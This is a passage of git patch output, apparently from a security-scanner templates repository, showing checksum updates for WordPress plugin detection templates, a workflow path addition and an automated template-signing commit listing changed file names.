-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:cde51ef6410f93bc7f6aeb88c46f8d4444d459eb -http/technologies/wordpress/plugins/sg-cachepress.yaml:4996a5b1393f47f45dcb4ea17ca83fd2f02612f8 -http/technologies/wordpress/plugins/sg-security.yaml:c8f64310ffb44afac15a1c595aabfba7d49d0514 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:974882c1a8f7fd492c30f99c5ac89a50ef11e0bc -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:30c15b0afcb960610f8c55c400f97f1d0aecd8b7 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:bc6f0b1037080fac949f1828f5ffcffe34f85015 -http/technologies/wordpress/plugins/simple-history.yaml:260b21ae07205e9f1d003bb5066f55094b4246a0 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1ab0b514d7bb105b9c930a064d97b9f4d5e661a2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:48ceea2a4d8f66074708aa72ab98d5ca85cb9cdd -http/technologies/wordpress/plugins/smart-slider-3.yaml:8311d7fcd57a1cc6c8499ec2ed0ad7992600b922 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:65bcba03172995a80d42374217c157d482f5bf73 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:f0b383dd9c2c91f0ab96afeb8cd35e9776382b92 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:700b0432c4c879e4244466c4b7d8c5fc379c90e6 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:b501cc814abf7c62ebcd572c9c5cd3d9b92a4a47 -http/technologies/wordpress/plugins/svg-support.yaml:998a535bd37f4155dd0365af0e4753e29788b9bc -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:5376c2999a1e2429ded96a612b1126aeb8262cce -http/technologies/wordpress/plugins/tablepress.yaml:4285d90f3e8b57f34ff2262bd49b0d10ae96419a -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4b4432f06be68d6cc258b364acf2fa407f0abeb9 -http/technologies/wordpress/plugins/templately.yaml:5269940e53a3a2301435b0e563ce28e30b264c40 -http/technologies/wordpress/plugins/the-events-calendar.yaml:133bce5bd4d26e707e77665d6173360556a57a38 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:34e5ffdca193b73314a71133e56591e04cea33f6 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7dc0fe6eac1d8e7740657db13ac6bb785378486c -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:07a7da513a29c0f9aecf934257f9c4f071db1771 -http/technologies/wordpress/plugins/under-construction-page.yaml:6d08ac4d471dad846b03efe56f171aaf715f2a97 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:045118935a004bea90d44b3b833a334f06b1095b +http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:3d242a4f76f54640f4c031c97039e912b72ba2e4 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ee8cb7e2f424b0c65a698e5552d9c488e0517dd2 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:90bce6cd0d6af4d083ea621009898e3b30d0753d -http/technologies/wordpress/plugins/webp-express.yaml:3763d7cf7e42491ba98dc11ed35978c2b1c4fc24 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:b3ffee2831df339180a94f5df3f8795d173cb0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:a4971f49a001ccd8745577089459c47fd6697dd1 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:699019f4f047d5ab2778c7aa2364a594b0514a08 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:cb46a421f5ae77ecce2d230472849442a3cf27b6 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c803551cc13cfd009286bf7788bac955bd52c274 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:fd2463a8db5f3333e5e590c1d876368b286eee81 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:f2412e568ff52fc6558fdd5aa576c63cbed6e868 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:4953150be350d6abc9d923412c1dc6dbe67dd2fb -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:9525494692034df0cc23ead90b12f07072343153 -http/technologies/wordpress/plugins/woocommerce-services.yaml:321a322c5f93122eba099fb821074b18f5f22b99 -http/technologies/wordpress/plugins/woocommerce.yaml:c25c0eb6bc879c1914dc1937c65a15c5ca880214 -http/technologies/wordpress/plugins/wordfence.yaml:2adbf257cf6af57fef5d69c48464b94fc7889e6b -http/technologies/wordpress/plugins/wordpress-importer.yaml:89d8d39352453f41e8b7ae2b565e3e33756044de -http/technologies/wordpress/plugins/wordpress-seo.yaml:f66c734ee221f9d24281ac89434216d9d153dd3d +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:7c8d911712c805c46265145f6c0fd382409c9468 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:33856906eccd385e4757967dfd901c8aef7e4868 -http/technologies/wordpress/plugins/wp-file-manager.yaml:f9dd934a99bf8b9bf25d48287112cacaa7141fee -http/technologies/wordpress/plugins/wp-google-maps.yaml:3401527c9dc6b173d1c32e9e5ac3e9eac75879ba -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65c4068c7d0c57db4395c4c8454fbcdce4b2d191 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9d7554e521dcf078768fca25a58acca5b986f333 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:05aa780ad3e061d3e1b14337244805e21bbd3585 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:6d689b3b7b3248b9e824ac5fa95e16f74bdf754c -http/technologies/wordpress/plugins/wp-optimize.yaml:c9112037d25cc875705aebc89e6ceb88eda59f77 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:230e533dd9d9c2f60b8d7d9151fbad0d5a3f3868 -http/technologies/wordpress/plugins/wp-reset.yaml:12eda30faf4fbee9ba942634048b2c23ef098262 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ceb0639248074c8ac80d11965216c466df129cf7 -http/technologies/wordpress/plugins/wp-rollback.yaml:7499d1e29d477903830f8f24dd9511f06dbd2033 -http/technologies/wordpress/plugins/wp-seopress.yaml:f2979b1447ff7dc5b3eebc84da502218729a0303 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:6d0924998f97df9b5409db30347da79a4515f256 -http/technologies/wordpress/plugins/wp-smushit.yaml:693d88c65f832df151202cec6b3e0087f50ef296 -http/technologies/wordpress/plugins/wp-statistics.yaml:09002d708e26a3b76211609d7301d96fe850922f -http/technologies/wordpress/plugins/wp-super-cache.yaml:c1872af5b8e038c5253c19a187735d74f6ecf597 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3e13e0b3712e8d5feee7e53cf1332931fce3e678 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:5966753b0c591f2c6da04a70c4f3cf4555a5212b -http/technologies/wordpress/plugins/wpforms-lite.yaml:c6bad38953ab4fe363c6027a9804bf85a9250941 -http/technologies/wordpress/plugins/wps-hide-login.yaml:a94ce48e99f0715117e9e3e610bb1b399099e8b3 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d9bba13cb7a3ba6131e8bf078ebdfdc98c3b3bea +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:4788db3239545832eba5c869e335e3f19a73dce9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8800,7 +8801,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fa6924da061f53625356dd25d3430d652aeb9c1e +templates-checksum.txt:63ad414f737c58be64b6e194d0efe04233e0c58a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 046fad206d69e67dae67cdffcd55239cf5767709 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 28 Jun 2024 06:37:37 +0000 Subject: [PATCH 0706/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4d5239fc12..811e597d1a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' + - 'http/misconfiguration/installer/kodbox-installer.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' From 5eb08a82d4481ea4841b78b64ce783c08da97771 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 28 Jun 2024 06:38:40 +0000 Subject: [PATCH 0707/1841] Auto Template Signing [Fri Jun 28 06:38:39 UTC 2024] :robot: --- http/misconfiguration/installer/kodbox-installer.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 